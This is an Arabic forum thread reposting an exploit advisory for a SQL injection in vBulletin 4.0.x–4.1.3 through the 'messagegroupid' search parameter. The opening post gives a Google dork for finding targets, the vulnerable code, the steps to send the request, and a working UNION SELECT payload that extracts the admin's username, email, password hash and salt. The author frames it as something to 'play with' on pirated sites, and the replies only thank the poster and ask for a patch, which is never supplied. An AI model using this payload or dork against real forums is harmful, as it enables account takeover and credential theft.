تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

السلام عليكم ورحمه الله وبركاته. بسم الله الرحمن الرحيم. كل عام وانتم بخير ومبارك علينا وعليكم الشهر الكريم . اليوم خلال تصفحي حصلت على هذه الثغرة كود الثغرة .:

  #1  
خبر تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection



السلام عليكم ورحمه الله وبركاته.
بسم الله الرحمن الرحيم.
كل عام وانتم بخير ومبارك علينا وعليكم الشهر الكريم .

اليوم خلال تصفحي حصلت على هذه الثغرة

كود الثغرة .:

كود:
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S   
# Software Link: [http://www.vbulletin.com/]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : []Please Log In
 
######################################################################################################
Vulnerability:
######################################################################################################
 
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability  in parameter "&messagegroupid" due to improper input validation.
 
#####################################################################################################
Vulnerable Code:
#####################################################################################################
 
File:    /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
 
 
 
         
        if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
 
        {
 
            $value = $registry->GPC['messagegroupid'];
 
            if (!is_array($value))
 
            {
 
                $value = array($value);
 
            }
 
 
 
            if (!(in_array(' ',$value) OR in_array('',$value)))
 
            {
 
                if ($rst = $vbulletin->db->query_read("
 
                    SELECT socialgroup.name
 
                    FROM " . TABLE_PREFIX."socialgroup AS socialgroup
 
--->                 WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")
 
                 
            }
 
 
 
############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
          --> Search Single Content Type
 
Keywords :   Valid Group Message
 
Search Type : Group Messages
 
Search in Group : Valid Group Id
 
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
 
 
###########################################################################################
Note:
###########################################################################################
 
Funny part was that, a similar bug was found in the same module, search  query two months back. Any way Vbulletin has released a patch as it was  reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people  to play with the many Nulled VB sites out there. " Say No to Piracy  Disclosure ".

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

ولهذا وٌجبَ التنبيــه .

اقتباس
  #2  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

اذا لم نتعلم منك ..فمن من نتعلم !
ممكن شرح حتى تكتمل الصورة بالنسبة لى
شكرا لك
اقتباس
  #3  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

ماهو ترقيع الثغرة ؟؟
اقتباس
  #4  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

آششكرك على التنبيـه ..
اقتباس
  #5  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

شكرا جدا

ممكن شرح ترقيع الثغرة ؟
اقتباس
  #6  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

لآهنت يالغلا

ودي لك ~
اقتباس
  #7  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

السلام عليكم

ما الترقيع لها؟
اقتباس
  #8  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

شكرا جزيلا
اقتباس
  #9  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection



يعطيك العافية يالغلا
جد مميز بكل شيء شكرا لحضرتك وشكراً للدعم العربي الذي علمني الكثير وما زلت اتعلم من هذا المعهد الكبير
اقتباس
  #10  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

مايستروا الـVbulletin من العيــار الثقيل
باركـ الله فيك ياغالي,أقول شوف الدعاء بالـ+++
اقتباس
  #11  
افتراضي رد: تنبيه : Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection

جزاك الله كل خير
اقتباس

الكلمات الدلالية (Tags)
(messagegroupid), 4.0.x, 4.1.3, =>, تنبيه, injection, sql, vbulletin


أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم
انواع عرض الموضوع تقييم هذا الموضوع
تقييم هذا الموضوع:

الانتقال السريع

مواضيع ذات صلة
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
C?ng ??ng vBulletin Vi?t Nam | vBulletin Vietnam Community - Powered by vBulletin Webstats7.Net تحليلات المواقع 0 2014-03-08 02:10 AM
ترقيع ثغرة vBSEO 3.6.0 PHP Injection WebCraker الحمــــاية vBulletin Security 5 2014-02-22 09:45 PM
Husky Injection Molding Systems Webstats7.Net تحليلات المواقع 0 2014-01-29 09:31 AM
كيفية منع الشلات و SQL Injection والسبام .. بالانجن اكس Nginx رووح القلوب دروس إدارة السيرفرات 0 2013-09-04 03:51 PM
Noor Injection | Noor Injection Webstats7.Net تحليلات المواقع 0 2013-08-01 08:31 PM


الساعة المعتمدة بتوقيت جرينتش +3 . الساعة الآن 05:05 AM.

جميع الحقوق محفوظة لـ الدعم العربي التطويري | مدعوم بواسطة فبلتن ®

Your Avatar

تسجيل الخروج غير مسجل

هل أنت متأكد برغبتك في الخروج من المنتدى؟ تسجيل الخروج